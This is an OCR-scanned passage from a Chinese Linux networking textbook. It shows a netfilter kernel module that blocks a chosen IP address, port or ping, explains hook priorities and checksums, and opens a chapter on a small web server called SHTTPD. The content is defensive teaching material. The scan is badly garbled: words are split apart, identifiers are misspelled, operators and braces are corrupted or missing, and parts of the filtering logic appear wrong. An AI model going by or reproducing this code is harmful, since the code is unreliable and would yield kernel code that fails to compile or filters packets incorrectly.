#include <net/tcp.h> /*TCP 头 部 结构 */ 
#include <linux/if ether.h> 

#include <linux/if packet.h> 

#include "nf sockopte.h" 

/* 版 权 声 明 */ 

MODULE LICENSE ("Dual BSD/GPL"); 

/* NF 初始 化 状态 宏 */ 

#define NF SUCCESS 0 

#define NF FAILURE 1 

/* 初始 化 绑 定 状态 */ 

band status b status ; 

/* 快 速 绑 定 操作 宏 */ 

/* 判断 是 否 禁止 TCP 的 端口 */ 

#define IS BANDPORT TCP(status)( status.band port.port != 0 && 
status.band port.protocol == IPPROTO_TCP) 

/* 判 断 是 否 禁止 UDP 端口 */ 

#define IS BANDPORT UDP(status)( status.band port.port != 0 && 
status.band port.protocol == IPPROTO UDP) 

/* 判断 端 是 否 禁 止 PING */ 

#define IS_BANDPING (status) ( status.band ping ) 

/* 判断 是 否 禁止 IP 协议 */ 

#define IS BANDIP(status) ( status.band ip ) 

/* nf sock 选项 扩展 操作 */ 


(2) 扩展 的 sockopt 设置 函数 nf_sockopt_set()。 这 个 函数 先 检查 是 否 用 户 有 权限 使 用 
展 命令 ， 通 常 只 有 root 用 户 才 有 操作 此 命令 的 权限 。 然 后 调用 copy_ffom_user0 函 数 将 
户 空 间 的 数据 复制 到 内 核 空间 中 ， 判 断 用 户 输入 的 命令 选项 类 型 进行 进一步 的 处 理 : 


“a 
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口 当 命令 为 SOE BANDIP 时 ， 表 示 设 置 禁止 主机 的 了 下。 这 时 ， 将 控制 变量 
b_status.band ip 设置 为 用 户 输入 的 他 地 址 。 

口 当 命 令 为 SOE BANDPORT 时 ， 表 示 禁 止 端口 。 根 据 用 户 的 协议 不 同 ， 将 控制 变 
量 b_status.band_port.protocol 分 别 设置 为 IPPROTO_TCP 和 IPPROTO_UDP; 并 同 
时 将 控制 变量 b_status.band_port.port 设置 为 用 户 输入 的 端口 值 。 

口 当 命令 为 SOE BANDPING 时 ， 表 示 禁 止 ping 操作 。 这 时 ， 将 控制 变量 
b_status.band_ping 设置 为 1， 表 示 禁 止 ping 操作 。 

static int 

nf sockopt set(struct sock *sock, 
int cmd, 


void _ user *user, 
unsigned int len) 


int ret = 0; 
struct band status status; 


/* 权限 检查 */ 
if(!capable (CAP_ NET ADMIN)) /* 没 有 足够 权限 */ 
{ 
ret = -EPERM; 
goto ERROR; 
} 
/* 从 用 户 空 间 复制 数据 */ 


ret = copy from user(&status, user,len); 


if(ret != 0) /* 复 制 数据 失败 */ 
ret = -EINVAL; 
goto ERROR; 
} 
/* 命令 类 型 */ 
switch (cmd) 
{ 
case SOE BANDIP: /* 禁 止 IP 协议 */ 
/* 设置 禁止 IP 协议 */ 
if(IS_BRNDIP(status) ) /* 设 置 禁止 IP 协议 */ 
b status.band ip = status.band ip; 
else /* 取 消 禁 止 */ 
b_status.band ip = 0; 
break; 
case SOE BANDPORT: /* 禁 止 端 口 */ 
/* 设置 端口 禁止 和 相关 的 协议 类 型 */ 
if(IS BANDPORT TCP (status)) /* 禁 止 TCP*/ 


i 
b_status.band port.protocol = IPPROTO_ TCP; 
b status.band port.port = status.band port.port; 
1 
else if(IS BANDPORT UDP(status) ) /* 禁 止 UDP*/ 
t{ 
b_status.band port.protocol = IPPROTO UDP; 
b_status.band port.port = status.band port.port; 
} 


else /* 其 他 */ 


me 
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b status.band port.protocol = 0; 
b_status.band port.port = 0; 


break; 
case SOE BANDPING: /* 禁 止 ping*/ 
if(IS BANDPING (status)) /* 禁 止 PING*/ 
b_status.band ping = 1; 
1 
else /* 取 消 禁 止 */ 
{ 
b status.band ping = 0; 
} 
break; 
default: /* 其 他 为 错误 命令 */ 
ret = -EINVAL; 
break; 


} 


ERROR: 
return ret; 


} 


(3) 扩展 获取 sockopt 选项 的 函数 nf_sockopt_get()。 这 个 函数 根据 用 户 输 入 的 命令 是 
否 为 SOE_BANDIP、SOE_BANDPORT 或 者 SOE BANDPING， 将 变量 b_status 的 值 复制 
给 用 户 。 


/* nf sock 操作 扩展 命令 操作 */ 
static int 
nf_sockopt get(struct sock *sock, 
int cmd, 
void _ user *user, 
unsigned int len) 


int ret = 0; 


/* 权限 检查 */ 
if(!capable (CAP_NET ADMIN)) /* 没 有 权限 */ 
{ 

ret = -EPERM; 

goto ERROR; 


} 
/* 将 数据 从 内 核 空间 复制 到 用 户 空 间 */ 


switch (cmd) 
上 
case SOE BANDIP: 
case SOE BANDPORT: 
case SOE BANDPING: 
/* 复 制 数据 */ 
ret = copy_to user(user, &b _ status,len); 
if(ret != 0) /* 复 制 数 据 失 败 */ 
ret = -EINVAL; 
goto ERROR; 
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} 
break; 
default: 
ret = -EINVAL; 
break; 
} 
ERROR: 


return ret; 


(4) LOCAL _OUT 钧 子 上 的 操作 。 钧 子 LOCAL _OUT 对 从 本 地 发 出 的 数据 包 进 行 过 
滤 。 在 这 个 钩子 上 ， 需 要 判断 本 地 发 出 的 数据 包 的 目的 地 址 是 否 为 已 经 禁止 主机 的 目的 地 
址 。 如 果 数 据 包 的 目的 地 址 是 已 经 禁止 的 主机 IP 地 址 ， 则 将 这 个 包 抛弃 。 

/* 在 LOCAL OUT 上 挂 接 钩子 */ 


static unsigned int nf hook out(unsigned int hooknum, 


有 


struct sk buff **skb, 

const struct net device *in, 
const struct net device *out, 
int (*okfn) (struct sk buff*)) 


struct sk buff *sk = *skb; 
struct iphdr *iph = ip hdr(sk); 


if (IS_BANDIP(b_status)) /* 判 断 是 否 禁止 IP 协议 */ 
{ 
if(b_status.band ip == iph->saddr) /*IP 地 址 符合 */ 
{ 
return NF_DROP; /* 丢 弃 该 网 络 报 文 */ 


} 
} 


return NF ACCEPT; 


(5) LOCAL IN 钧 子 上 的 操作 。 钧 子 LOCAL IN 用 于 过 滤 发 往 本 机 的 数据 包 。 对 于 
这 些 数据 包 ， 要 根据 不 同 的 协议 进行 处 理 。 


口 


口 


口 


如 果 为 TCP 协议 的 数据 包 ， 将 目的 卫 地 址 端口 变量 tcph->dest 与 禁止 端口 变量 
b_status.band_port.port 进行 比较 ， 如 果 相 同 ， 则 把 这 个 数据 包 丢 弃 。 

如 果 为 UDP 协议 的 数据 包 ， 与 TCP 协议 数据 包 的 操作 相同 ， 将 目的 卫 地 址 端口 
变量 tcph->dest 与 禁止 端口 变量 b_status.band_port.port 进行 比较 , 如 果 相 同 则 把 这 
个 数据 包 丢弃 。 

如 果 为 ICMP 协议 的 数据 包 ,， 则 查看 变量 b_status 是 否 已 经 设置 了 禁止 ping, 如 果 
已 经 设置 ， 就 把 这 个 数据 包 丢 弃 ， 同 时 将 信息 打印 出 来 。 


/* 在 LOCAL IN 挂 接 钧 子 */ 


static unsigned int nf hook in(unsigned int hooknum, 


struct sk buff **skb, 

const struct net device *in, 
const struct net device *out, 
int (*okfn) (struct sk buff*)) 


struct sk buff *sk = *skb; 
struct iphdr *iph = ip hdr(sk); 


we 
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unsigned int src ip iph->saddr; 


struct tcphdr *tcph = NULL; 
struct udphdr *udph = NULL; 
Switch (iph->protocol) /*IP 协议 类 型 */ 
| 
case IPPROTO TCP: /*TCP 协议 */ 
/* 丢 弃 禁 止 端 口 的 TCP 数据 */ 


if(IS BANDPORT TCP(b status)) 

{ 
tcph = tcp hdr (sk); /* 获 得 TCP 头 */ 
if(tcph->dest == b_status.band port.port)  /* 端 口 匹配 */ 
{ 


return NF DROP; /* 丢 弃 该 数据 */ 

上 
} 
break; 

case IPPROTO_ UDP: /*UDP 协议 */ 

/* 丢 弃 UDP 数据 */ 
if(IS BANDPORT UDP(b_ status)) /* 设 置 了 丢弃 UDP 协议 */ 
{ 

udph = udp hdr (sk); /*UDP 头 部 */ 


if(udph->dest == b_status.band port.port) 


/*UDP 端口 判定 */ 
{ 


return NF _DROP; /* 丢 弃 该 数据 */ 
} 
break; 
case IPPROTO ICMP: /*ICMP 协议 */ 
/* 丢 弃 ICMP 报 文 */ 
if(!IS BANDPING(b_status)) /* 设 置 了 禁止 PING 操作 */ 


{ 
printk (KERN ALERT "DROP ICMP packet from %d.%d.%11ld.%lld\n", 
(src_ip&g0xff000000) >>24， 
(src_ip&g0x00ff0000) >>16， 
(src_ip&0xff0000ff00) >>8， 
(src_ip&0xff000000ff) >>0) 7 
return NF_DROP; /* 丢 弃 该 报 文 */ 
} 


break; 
default: 
break; 
L 


return NF ACCEPT; 


(6) 初始 化 钩子 LOCAL IN 和 LOCAL OUT。 在 钩子 LOCAL IN 上 ， 挂 接 处 理 函 数 
nf hook in0)。 在 钧 子 LOCAL OUT 上 ， 挂 接 处 理 函 数 nf_hook_out()。 二 者 的 优先 级 均 为 
NF_IP_PRI FIRST， 在 PF_INET 协议 上 进行 监视 。 

/* 初始 化 nfin 钩子 ,在 钩子 LOCAL IN 上 */ 


static struct nf hook ops nfin = 


i 
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-hook = nf hook in 

.hooknum = NF_IP LOCAL _ IN， 

DE PP EN 

.Priority = NF_IP LOCAL OUT 
HB 
/* 初 始 化 nfout 钩子 ,在 钧 子 LOCAL OUT 上 */ 
static struct nf hook ops nfout= 
上 

-hook = nf hook out， 

-hooknum = NF_IP LOCAL OUT, 

.pf = PF_INET, 

.Priority = NF_IP PRI FIRST 
i 


(7) 初始 化 nf 套 接 字 选项 。 初始化 结构 nf_sockopt_ops 类 型 的 变量 nfsockopt， 分 别 设 
置 其 获取 套 接 字 选 项 函数 nf_sockopt_get() 和 设置 套 接 字 选 项 函数 nf sockopt_set()。 


/* 初始 化 nf 套 接 字 选 项 */ 
static struct nf sockopt ops nfsockopt = { 
.pf = PF_INET, 
.Set_ optmin = SOE BANDIP, 
.Set_optmax = SOE BANDIP+2, 
“Bet = nf_sockopt set, 
.get optmin = SOE BANDIP, 
.get_ optmax = SOE BANDIP+2, 
.get = nf sockopt get, 
县 


(8) 模块 初始 化 和 退出 。 

模块 的 初始 化 中 ， 注 册 LOCAL IN 钩子 、LOCAL _ OUT 钩子 的 处 理 函 数 ， 并 注册 扩 
展 套 接 字 选项 nfsockipt。 

模块 的 退出 ， 则 将 上 述 注册 的 钧 子 函数 取消 注册 ， 同 时 取消 注册 的 扩展 套 接 字 选 项 
函数 。 

/* 初始 化 模块 */ 


static int _ init init(void) 


el 


nf register hook (gnfin); /* 注 册 LOCAL IN 的 钩子 */ 
nf _ register hook(gnfout); /* 注 册 LOCAL_OUT 的 钩子 */ 
nf register sockopt (&nfsockopt) ; /* 注 册 扩 展 套 接 字 选项 */ 
printk (KERN ALERT "netfilter example 2 init successfully\n"); 
/* 打 印信 息 */ 

return NF SUCCESS; 

} 

/* 清理 模块 */ 

static void exit exit(void) 

{ 
nf unregister hook(&nfin) /* 注 销 LOCAL IN 的 钧 子 */ 
nf _ unregister hook (gnfout); /* 注 销 LOCAL_OUT 的 钩子 */ 
nf_unregister sockopt (gnfsockopt); /* 注 销 扩展 套 接 字 选项 */ 
printk (KERN ALERT "netfilter example 2 clean successfully\n"); 

} 

module init (init); /* 初 始 化 模块 */ 

module exit (exit); /* 模 块 退出 */ 


ws 
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(9) 附加 信息 。 对 模块 的 作者 、 描 述 、 版 本 声明 、 别 名 声明 等 信息 进行 设置 。 
/* 作者 、 描 述 、 版 本 、 别 名 */ 


MODULE AUTHOR("Jingbin Song"); /* 作 者 声明 */ 

MODULE DESCRIPTION ("netfilter DEMO"); /* 模 块 描述 信息 声明 */ 
MODULE VERSION ("0.0.1"); /* 模 块 版 本 声明 */ 
MODULE ALIAS ("ex17.2"); /* 模 块 别 名 声明 */ 


17.6.8 应 用 层 测试 代码 实现 


用 户 空间 的 操作 很 简单 ， 就 是 用 socket 打开 相关 协议 类 型 的 socket， 直 接 调用 
set()/getsockopt() 函 数 就 可 以 进行 操作 了 。 在 第 12 章 中 有 详细 的 介绍 ， 读 者 可 以 参考 自己 
来 编写 ， 要 注意 建立 socket 时 使 用 RAW 类 型 ， 例 如 : 


int nf_test(void) 
{ 
band status; 
socklen t len; 
len = sizeof (band status); 
// 打开 RAW 类 型 的 socket 
if ((sockfd = socket (AF _ INET, SOCK_ RAW, IPPROTO RAW)) == -1) 
return -1; 
// 读 取 状 态 信息 
if (getsockopt (sockfd, IPPROTO IP, SOE BANDPING, (char *) &band status, &len)) 
return -1; 
return 0; 


编译 代码 时 ， 可 以 参考 17.3.6 节 的 Makefile 例子 。 在 测试 时 ， 需 要 先 加 载 内 核 模 块 ， 
然后 运行 应 用 程序 进行 测试 。 例 如 ， 当 禁止 ping 时 ， 内 核 会 打印 如 下 信息 : 

netfilter example 2 :init successfully 

Dropped packet from... 127.0.0.1 

Dropped packet from... 127.0.0.1 


Dropped packet from... 127.0.0.1 
netfilter example 2 clean successfully 


当然 ， 本 例 仅仅 是 对 netfilter 的 框架 进行 介绍 ， 离 实用 性 还 比较 远 。 例 如 容错 机 制 不 
够 完善 ， 当 发 生 错误 时 没有 进行 十 分 有 效 的 处 理 ， 没 有 对 公共 变量 进行 互 斥 锁定 ， 有 可 能 
发 生 同时 修改 和 读 取 公 共 变 量 的 情况 ，IP 地 址 禁止 的 方法 不 够 完善 ， 不 能 进行 有 效 的 屏 
项 等 。 


17.7 ”一 点 多 个 钩子 的 优先 级 


在 17.4 节 中 介绍 了 一 个 简单 的 netfilter 程序 ， 读 者 可 能 在 运行 时 会 得 不 到 与 本 书 不 一 
致 的 输出 信息 。 即 使 环境 设置 正确 ， 也 有 可 能 出 现 此 类 情况 ， 造 成 这 种 现象 的 原因 之 一 可 
能 就 是 钩子 优先 级 的 设置 问题 。 
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例如 ， 在 netfilter 的 同一 个 挂 接 点 (hook) 上 先后 注册 了 3 个 函数 : 


£1(); 
£2(); 
£3(); 


当 一 个 包 到 达 这 个 挂 接 点 后 ， 是 不 是 先 交 给 fl 处 理 , 等 fl 处 理 完毕 后 再 依次 送 给 亿 、 
他 去 处 理 呢 ? 还 是 处 理 完 fl 就 直接 离开 呢 ? 另外, 如果 系 统 中 用 iptables 设置 了 过 滤 规 则 ， 
是 否 等 用 户 的 函数 处 理 完毕 自动 去 处 理 其 规则 ， 还 是 需要 显 式 调用 呢 ? 

其 实 上 面 的 问题 是 同一 个 问题 ， 即 钩子 的 优先 级 问题 。 当 在 同一 个 挂 接点 上 注册 了 多 
个 钩子 时 ，netfilter 对 多 个 钩子 的 处 理 原则 是 按照 优先 级 从 高 〈 值 越 小 优先 级 越 高 ) 到 低 依 
次 执行 。 后 面 的 钩子 是 否 会 被 调用 需要 看 前 一 个 钩子 的 处 理 结 果 ， 如 果 前 一 个 钩子 的 返回 
值 不 是 NF_ACCEPT， 则 netfilter 不 会 调用 后 面 的 钩子 。 在 注册 钧 子 的 时 候 ， 注 册 函 数 已 
经 按照 优先 级 将 钩子 排列 好 了 。 

钧 子 的 优先 级 如 在 Linux 内 核 中 定义 如 下 : 


enum nf ip hook Priorities { 
NF_IP_PRI FIRST = INT MIN, 
NF IP PRI CONNTRACK DEFRAG = -400, 
NF_IP_PRI RAW = -300, 
NF IP PRI SELINUX FIRST = -225, 
NF_IP_PRI CONNTRACK = -200, 
NF IP PRI MANGLE = -150, 
NF_IP_PRI NAT DST = -100, 
NF_IP_ PRI FILTER = 0， 
NF IP PRI NAT SRC = 100, 
NF_IP_PRI SELINUX LAST = 225, 
NF IP PRI CONNTRACK CONFIRM = INT MAX, 
NF_IP_PRI_ LAST = INT MAX, 


}; 


因此 当 注 册 钧 子 的 时 候 设 置 优先 级 必须 慎重 ， 如 果 特 别 重要 的 处 理 ， 就 将 优先 级 设置 
得 高 一 点 。 如 果 处 理 并 不 重要 或 者 依赖 别 的 处 理 过 程 最 好 把 优先 级 设置 得 低 一 点 。 而 且 ， 
不 是 核心 目的 不 要 随便 丢掉 数据 ， 而 是 要 返回 NF_ACCEPT， 给 后 面 的 钩子 处 理 的 机 会 。 


17.8 校 验 和 问题 


在 以 上 所 举例 中 ， 都 没有 修改 网 络 的 数据 。 因 此 ， 没 有 造成 副作用 ， 当 发 生 了 数据 变 
化 的 时 候 ， 则 又 出 现 了 一 个 新 的 问题 ， 即 校 验 和 的 问题 。 在 网 络 的 ISO 模型 中 ， 介 绍 了 网 
络 数据 的 结构 ， 在 卫 层 和 TCP、UDP 层 均 有 CRC 校 验 以 保证 网 络 传输 数据 的 正确 性 。 

当 修 改 了 网 络 数据 的 时 候 要 对 数据 按照 从 上 至 下 的 顺序 重新 进行 校 验 ， 例 如 修改 了 
TCP 层 的 数据 ， 则 在 TCP 的 CRC 重新 计算 之 后 ， 还 要 重新 计算 IP 层 的 CRC 校 验 和 。 在 
IP 协议 栈 中 的 CRC 校 验 是 16 位 而 不 是 通常 采用 的 32 位 值 ， 在 Linux 的 内 核 中 已 经 实现 
了 高 效 的 CRC 校 验 代码 ， 例 如 ，do_csum 的 代码 如 下 ， 对 8 位 、16 位 等 数据 均 进 行 优 化 
处 理 : 


static unsigned short do csum(const unsigned char *buff, int len) 


{ 


register unsigned long sum = 0; 
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int swappem = 0; 
if (1 & (unsigned long)buff) { 
sum = *buff << 8; 
buff++; 
len--; 
++swappem; 


} 

while (len > 1) { 
sum += *(unsigned short *)buff; 
buff += 2; 
len -= 2; 


I 
if (len > 0) 
sum += *buff; 
/* Fold 32-bit sum to 16 bits */ 
while (sum >> 16) 
sum = (sum & Oxffff) + (sum >> 16); 
if (swappem) 
sum = ((sum & Oxff00) >> 8) + ((sum & 0x00ff) << 8); 
return sum; 


1 
利用 已 有 的 资源 ， 对 校 验 和 进行 重新 计算 的 关键 代码 如 下 : 


struct sk buff *sk = *skb; 

struct iphdr *iph; 

iph->check 于 

iph->check ip_fast_csuml( (unsigned char*)iph,iph->ihl); 


校 验 和 重新 计算 以 后 ， 对 数据 的 修改 而 造成 的 CRC 错误 就 修正 了 。 
17.9 小 结 


本 章 主要 介绍 了 netfilte 框架 内 的 报 文 处 理 ， 并 给 出 了 简单 的 例子 向 读者 介绍 其 用 法 。 
先 对 netfilter 的 框架 进行 了 简单 的 介绍 ， 对 其 中 的 5 个 钩子 点 及 钩子 的 挂 接 方法 进行 了 比 
较 详 细 的 介绍 。 由 于 netfilter 的 框架 是 Linux 内 核 部 分 的 内 容 , 所 以 本 章 的 内 容 包含 了 Linux 
可 加 载 模块 的 编写 、 编 译 方法 。 本 章 还 用 一 个 简单 的 例子 向 读者 展示 了 如 何 使 用 netfilter 
的 框架 进行 网 络 数据 报 文 的 过 滤 ， 最 后 介绍 了 在 同一 个 钧 子 点 挂 接 多 个 钩子 时 的 优先 级 和 
进行 报 文 过 滤 的 校 验 和 问题 。 


| 


Sa 
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第 18 章 一 个 简单 Web 服务 器 的 
本 SHTTPD 


在 第 6 章 的 用 户 空间 网 络 程序 简介 中 对 HTTP 协议 进行 了 简单 的 介绍 ， 本 章 将 实现 一 
个 简单 的 Web 服务 器 程序 一 一 SimpleHTTPDemo, 简称 SHTTPD。 这 个 Web 服务 器 可 以 实 
现 简单 的 用 户 配置 、 静 态 网 页 响应 等 功能 。 按 照 如 下 步骤 进行 设计 和 编写 程序 : 

口 定义 需求 ， 明 确 需求 定义 。 

口 对 需求 进行 分 析 ， 明 确实 现 的 方式 和 关键 的 问题 ， 进 行 模块 设计 。 

口 按照 模块 设计 ， 进 行 编 码 。 

口 最 后 进行 编译 和 测试 。 


18.1 SHTTPD 的 需求 分 析 


Web 服务 器 SHTTPD 可 以 实现 动态 配置 、 多 客户 访问 、CGI 支持 、 支 持 HTTP/1.0 版 
本 ， 最 终 能 实现 简单 的 可 用 型 Web 服务 器 ， 多 种 浏览 器 可 以 正常 访问 SHTTPD 上 的 网 页 ， 
如 图 18.1 所 示 。 本 节 将 对 SHTTPD 的 功能 进行 说 明 。 
谷歌 浏览 器 


/一 客户 端 


火狐 浏览 器 
IE 浏览 器 


便携 电脑 便携 电脑 


GET /CGI-BINwhoami? SHTTP HTTP/ 1.0 


GET /CGI-BINwhoami?SHTTP HTTP/ 1.0 


CA 
GET/CGI-BINwhoami?SHTTP HTTP/ 1.0 


服务 器 SHTTPD 


图 18.1 多 浏览 器 访问 支持 


18: 丰 1 
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SHTTPD 启动 参数 可 动态 配置 的 需求 


服务 器 SHTTPD 可 以 动态 配置 启动 参数 , 例如 服务 器 的 侦 听 端口 、 支 持 客户 端 并 发 访 
问 的 数量 、 超 时 时 间 的 设置 、 访 问 Web 网 页 的 路 径 等 。 采 用 参数 配置 和 文件 配置 两 种 支持 
方式 ， 在 优先 级 上 ， 参 数 配置 比 文件 配置 的 优先 级 高 ， 参 数 配 置 的 选项 值 会 缆 盖 文件 配置 


的 选项 。 


和 


命令 行 参数 配置 


全 令 


命令 行 配置 的 命令 格式 如 下 : 


SHTTPD --ListenPort number --MaxClient number -DocumentRoot path -CGIRoot 
path -DefaultFile filename -TimeOut seconds -ConfigFile filename 


配置 选项 的 含义 如 下 所 述 。 


口 


--ListenPort number: 配置 侦 听 端口 ，ListenPort 为 关键 字 , number 为 服务 器 的 侦 听 
端口 。 例 如 ， 如 下 命令 使 SHTTPD 在 8888 端口 侦 听 。 默 认 设 置 为 8080。 


$SHTTPD -ListenPort 8888 


口 


口 


2 


--MaxClient number: 最 大 支持 客户 端 数 量 ，MaxClient 为 关键 字 ，number 为 客户 
端的 数量 ， 默 认 设置 为 4。 

-DocumentRoot path: 服务 器 搜寻 Web 网 页 的 根 目 录 ，DocumentRoot 为 关键 字 ， 
path 为 路 径 名 称 ， 必 须 设置 为 全 路 径 ， 权 限 与 运行 SHTTPD 的 用 户 权限 相同 。 默 
认 路 径 为 /usr/local/Var/www。 

-CGIRoot path: 服务 器 查找 CGI 程序 的 位 置 ， 以 此 作为 根 目录 。CGIRoot 为 关键 
字 ，path 为 路 径 ， 必 须 为 全 路 径 。 默 认 路 径 为 /usr/local/var/www/cgi-bin。 
-DefaultFile filename: 当 用 户 没 有 指定 目录 下 的 文件 名 时 ， 默 认 发 送 给 客户 端的 文 
件 。DefaultFile 为 关键 字 ，filename 为 设置 的 文件 名 ， 默 认为 index.html。 
-TimeOut seconds: 客户 端 使 用 HTTP/1.1 协议 访问 的 时 候 ， 客 户 端 长 时 间 没 有 访 
问 服务 器 时 ， 服 务 器 断 开 连接 的 超时 时 间 。TimeOnut 为 关键 字 ，seconds 为 客户 端 
上 次 访问 的 最 长 间隔 ， 超 过 这 个 时 间 服 务 器 自动 断 开 此 连接 。 默 认 值 为 3 秒 。 
--ConfigFile filename: 指定 Web 服务 器 SHTTPD 的 配置 文件 。ConfigFile 为 关键 
字 ，filename 为 配置 文件 的 路 径 ， 包含 配置 文件 的 文件 名 。 默 认 配 置 时 配置 文件 为 
/etc/SHTTPD.conf。 


文件 配置 


配置 文件 的 名 称 为 SHTTPD.conf， 默 认 路 径 为 “/etc” 下 。 配 置 文件 的 格式 如 下 : 

[# 注 释 | [空格 ] 关键 字 [ 空 格 ] = [空格 ] value] 

配置 文件 中 的 一 行为 # 开 头 的 注释 或 者 选项 配置 ， 不 支持 空 行 ， 关 键 字 右 边 的 值 不 能 
含有 空格 。 各 部 分 如 下 定义 。 

# 注 释 : 一 行 以 # 开 始 表示 此 行为 注释 ， 程 序 不 对 此 行进 行 分 析 。 

空格 : 可 以 为 0 个 或 者 多 个 空格 。 


we 
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关键 字 : 可 以 为 如 下 的 字符 串 ， 大 小 写 必 须 完 全 匹配 。 

ListenPort:， 侦 听 端 口 。 

MaxClient: 最 大 客户 端 并 行 访问 数 。 

DocumentRoot: Web 网 页 根 目 录 。 

CGIRoot: CGI 程序 根 目录 。 

DefaultFile: 默认 访问 网 页 名 称 。 

TimeOut: 客户 端 连 接 空闲 超时 时 间 。 

直 : 用 户 对 关键 字 选 项 的 配置 ， 全 部 为 字符 串 。 值 中 不 能 有 引号 、 换 行 符 、 空 格 〈 末 
尾 的 空格 将 被 解释 为 值 的 一 部 分 )，ListenPort、TimeOnut 等 不 支持 十 六 进 制 的 “0x” 方 式 。 
下 面 为 配置 文件 实例 。 


#SHTTPD Web 服务 器 配置 文件 示例 


全 OOOODODO 


# 侦 听 端 口 

ListenPort = 80 

4 最大 并发 访问 客户 并 
MaxClient = 

#Web 网 页 根 目录 

DocumentRoot = /home/www/ 
#CGI 根 目录 

CGIRoot = /home/www/cgi-bin/ 
# 默 认 访问 文件 名 

DefaultFile = default.htm 
| 

TimeOut 


全 注意 : SHTTPD 在 用 户 不 进行 配置 的 时 候 可 以 正常 运行 ， 此 时 采用 默认 配置 。 有 配置 文 
件 则 相应 的 选项 覆盖 默认 配置 。 命 令 行 输入 履 盖 文件 配置 和 默认 配置 。 例 如 
图 18.2 所 示 为 服务 器 参数 配置 更 改过 程 。 图 中 从 左 到 右 为 系统 默认 配置 、 配 置 文 


件 配置 和 用 户 启动 程序 时 的 更 改 。 
更 改 
更 改 DocumentRoot 
DocumentRoot MaxClient 
ListenPort 
ListenPort 8080 ListenPort ~ C8080 ListenPort 8888 
MaxClient 站 MaxClient 4 MaxClimt :8 
DocumentRoot:/usr/local /var/www/ DocumentRoot:/usr/var/www/ DocumentRoot/home/www/ 
CGIRoot yusr/local/var/www/cgi-bin/ CGIRoot yusr/local/var/www/cgi-bin/ CGIRoot yusr/local/var/www/cgi-bin/ 
DefaultFile 。 :indexhtml DefaultFile 。 index html DefaultFile 。 :index html 
TimeOut 3 TimeOut 3 TimeOut 3 


DocumentRoot 


/lust/var/ www/ 


Debian#shttpd 
—MaxClient 8 

~ListenPort 8888 

~—DocumentRoot=/home/www 


用 户 启动 服务 器 
图 18.2 SHTTPD 配置 参数 的 更 改 流程 
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18.1.2 ”SHTTPD 的 多 客户 端 支持 的 需求 


SHTTPD 支持 多 个 客户 端的 并 发 连接 ， 在 同一 时 刻 允 许多 个 客户 端 同时 成 功 获得 服务 
器 上 的 网 页 资源 , 这 是 现代 服务 器 的 基本 属性 。 SHTTPD 启动 时 的 处 理 单元 初始 化 了 两 个 ， 
并 发 访问 数量 为 2， 当 客户 端 增加 时 ， 会 自动 根据 现场 情况 增加 处 理 单元 ， 最 大 为 4 个 。 

如 图 18.3 所 示 , 两 个 客户 端 同时 对 SHTTPD 进行 访问 , 均 能 获得 其 响应 信息 “欢迎 ”。 

如 图 18.4 所 示 ， 当 客户 端 增多 ， 达 到 4 个 的 时 候 ，SHTTPD 会 自动 增加 2 个 来 响应 用 
户 的 请 求 。 


一 


便携 电脑 


图 18.3 2 个 并 发 处 理 单元 图 18.4 增加 2 个 并 发 处 理 单元 


当 超过 4 个 客户 端 并 发 访问 时 ，SHTTPD 服务 器 会 将 后 来 的 请 求 放 在 排序 队列 中 ， 当 
处 理 单元 空闲 时 再 响应 其 请 求 ， 如 图 18.5 所 示 。 


18.1.3 SHTTPD 支持 方法 的 需求 


HTTP 协议 中 定义 了 8 种 方法 ， 用 来 表示 指定 数据 的 操作 性 质 和 特点 。 

口 HEAD 方法 :这 种 方法 要 求 与 相应 GET 请 求 的 方式 一 样 ,但 是 没有 响应 体 (response 
body) ， 即 没有 内 容 。 这 种 方法 对 于 获得 内 容 的 信息 很 有 作用 ， 因 为 它 不 能 获取 
数据 的 内 容 ， 但 是 能 获得 内 容 的 大 小 、 时 间 等 信息 。 

口 GET 方法 : 这 种 方法 用 来 请 求 指定 的 资源 ， 它 是 目前 网 上 最 常用 的 方法 。 这 种 方 
法 要 求 对 请 求 的 网 络 资源 进行 定位 和 内 容 传输 。 

口 POST 方法 : 这 种 方法 用 来 向 指定 的 资源 提交 需要 处 理 的 数据 ， 与 GET 方法 的 区 
别 是 这 些 数据 写 在 请 求 的 内 容 里 。 


sa 


图 18.5 并 发 访问 超过 SHTTPD 处 理 能 力 时 等 待 


PUT: 上 传 指定 资源 。 

DELETE: 删除 指定 资源 。 

TRACE 方法 : 这 种 方法 告诉 服务 器 端 返回 收 到 的 请 求 。 客 户 端 可 以 通过 此 方法 查 

看 在 请 求 过 程 中 中 间 服 务 器 添加 或 者 改变 了 哪些 内 容 。 

口 OPTIONS 方法 : 这 种 方法 返回 服务 器 在 指定 URL 上 支持 的 HTTP 方法 。 通 过 请 
求 “*” 而 不 是 指定 的 资源 ， 这 个 方法 可 以 用 来 检查 网 络 服务 器 的 功能 。 

口 CONNECT 方法 : 这 种 方法 将 请 求 的 连接 转换 成 透明 的 TCP/IP 通道 ， 通 常用 来 简 
化 通过 非 加 密 的 HTTP 代理 的 SSL- 加 密 通信 (HTTPS) 。 

HTTP 服务 器 至 少 应 该 实现 GET 和 HEAD 方法 ， 可 能 的 话 ， 也 实现 OPTIONS 方法 。 


18.1.4 SHTTPD 支持 的 HTTP 协议 版 本 的 需求 


超 文本 传输 协议 从 开始 出 现 到 现在 已 经 演化 出 了 很 多 版 本 ， 它 们 中 的 大 部 分 都 是 向 下 
兼容 的 。 在 RFC 2145 中 描述 了 HTTP 版 本 号 的 用 法 。 客 户 端 在 请 求 的 时 候 先 告诉 服务 器 
客户 端 所 采用 的 HTTP 协议 版 本 号 ， 而 后 者 则 在 响应 中 采用 相同 或 者 更 早 的 协议 版 本 。 目 
前 版 本 有 0.9、1.0 和 1.1 版 本 。 

口 HTTP/0.9 版 本 : 版 本 0.9 是 已 经 过 时 的 版 本 ， 它 只 接受 一 种 请 求 方法 GET， 没 有 

在 通信 字段 中 指定 版 本 号 ， 且 不 支持 请 求 头 。 由 于 该 版 本 不 支持 POST 方法 ， 所 
以 客户 端 无 法 向 服务 器 传递 太 多 信息 。 
口 HTTP/1.0 版 本 : 这 是 第 一 个 在 通信 中 指定 版 本 号 的 HTTP 协议 版 本 ， 至 今 仍 被 广 


口 口 口 


-a 
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泛 采 用 ， 特 别 是 在 代理 服务 器 中 。 
口 HTTP/1.1 版 本 : 这 是 目前 流行 的 版 本 ， 是 一 种 默认 采用 持久 连接 的 版 本 ， 并 能 很 
好 地 配合 代理 服务 器 工作 。 


18.1.5 ”SHTTPD 支持 头 部 的 需求 


